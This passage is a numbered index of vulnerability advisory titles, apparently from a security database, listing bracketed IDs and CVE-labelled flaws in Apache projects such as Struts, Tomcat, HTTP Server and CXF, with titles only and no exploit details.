6048| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
6049| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
6050| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
6051| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
6052| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
6053| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
6054| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
6055| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
6056| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
6057| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
6058| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
6059| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
6060| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
6061| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
6062| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
6063| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
6064| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
6065| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
6066| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
6067| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
6068| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
6069| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
6070| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
6071| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
6072| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
6073| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
6074| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
6075| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
6076| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
6077| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
6078| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
6079| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
6080| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
6081| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
6082| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
6083| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
6084| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
6085| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
6086| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
6087| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
6088| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
6089| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
6090| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
6091| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
6092| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
6093| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
6094| [76933] Apache James Server Unspecified Command Execution Vulnerability
6095| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
6096| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
6097| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
6098| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
6099| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
6100| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
6101| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
6102| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
6103| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
6104| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
6105| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
6106| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
6107| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
6108| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
6109| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
6110| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
6111| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
6112| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
6113| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
6114| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
6115| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
6116| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
6117| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
6118| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
6119| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
6120| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
6121| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
6122| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
6123| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
6124| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
6125| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
6126| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
6127| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
6128| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
6129| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
6130| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
6131| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
6132| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
6133| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
6134| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
6135| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
6136| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
6137| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
6138| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
6139| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
6140| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
6141| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
6142| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
6143| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
6144| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
6145| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
6146| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
6147| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
6148| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
6149| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
6150| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
6151| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
6152| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
6153| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
6154| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
6155| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
6156| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
6157| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
6158| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
6159| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
6160| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
6161| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
6162| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
6163| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
6164| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
6165| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
6166| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
6167| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
6168| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
6169| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
6170| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
6171| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
6172| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
6173| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
6174| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
6175| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
6176| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
6177| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
6178| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
6179| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
6180| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
6181| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
6182| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
6183| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
6184| [68229] Apache Harmony PRNG Entropy Weakness
6185| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
6186| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
6187| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
6188| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
6189| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
6190| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
6191| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
6192| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
6193| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
6194| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
6195| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
6196| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
6197| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
6198| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
6199| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
6200| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
6201| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
6202| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
6203| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
6204| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
6205| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
6206| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
6207| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
6208| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
6209| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
6210| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
6211| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
6212| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
6213| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
6214| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
6215| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
6216| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
6217| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
6218| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
6219| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
6220| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
6221| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
6222| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
6223| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
6224| [64780] Apache CloudStack Unauthorized Access Vulnerability
6225| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
6226| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
6227| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
6228| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
6229| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
6230| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
6231| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
6232| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
6233| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
6234| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
6235| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
6236| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
6237| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
6238| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
6239| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
6240| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
6241| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
6242| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
6243| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
6244| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
6245| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
6246| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
6247| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
6248| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
6249| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
6250| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
6251| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
6252| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
6253| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
6254| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
6255| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
6256| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
6257| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
6258| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
6259| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
6260| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
6261| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
6262| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
6263| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
6264| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
6265| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
6266| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
6267| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
6268| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
6269| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
6270| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
6271| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
6272| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
6273| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
6274| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
6275| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
6276| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
6277| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
6278| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
6279| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
6280| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
6281| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
6282| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
6283| [59670] Apache VCL Multiple Input Validation Vulnerabilities
6284| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
6285| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
6286| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
6287| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
6288| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
6289| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
6290| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
6291| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
6292| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
6293| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
6294| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
6295| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
6296| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
6297| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
6298| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
6299| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
6300| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
6301| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
6302| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
6303| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
6304| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
6305| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
6306| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
6307| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
6308| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
6309| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
6310| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
6311| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
6312| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
6313| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
6314| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
6315| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
6316| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
6317| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
6318| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
6319| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
6320| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
6321| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
6322| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
6323| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
6324| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
6325| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
6326| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
6327| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
6328| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
6329| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
6330| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
6331| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
6332| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
6333| [54798] Apache Libcloud Man In The Middle Vulnerability
6334| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
6335| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
6336| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
6337| [54189] Apache Roller Cross Site Request Forgery Vulnerability
6338| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
6339| [53880] Apache CXF Child Policies Security Bypass Vulnerability
6340| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
6341| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
6342| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
6343| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
6344| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
6345| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
6346| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
6347| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
6348| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
6349| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
6350| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
6351| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
6352| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
6353| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
6354| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
6355| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
6356| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
6357| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
6358| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
6359| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
6360| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
6361| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
6362| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
6363| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
6364| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
6365| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
6366| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
6367| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
6368| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
6369| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
6370| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
6371| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
6372| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
6373| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
6374| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
6375| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
6376| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
6377| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
6378| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
6379| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
6380| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
6381| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
6382| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
6383| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
6384| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
6385| [49290] Apache Wicket Cross Site Scripting Vulnerability
6386| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
6387| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
6388| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
6389| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
6390| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
6391| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
6392| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
6393| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
6394| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
6395| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
6396| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
6397| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
6398| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
6399| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
6400| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
6401| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
6402| [46953] Apache MPM-ITK Module Security Weakness
6403| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
6404| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
6405| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
6406| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
6407| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
6408| [46166] Apache Tomcat JVM Denial of Service Vulnerability
6409| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
6410| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
6411| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
6412| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
6413| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
6414| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
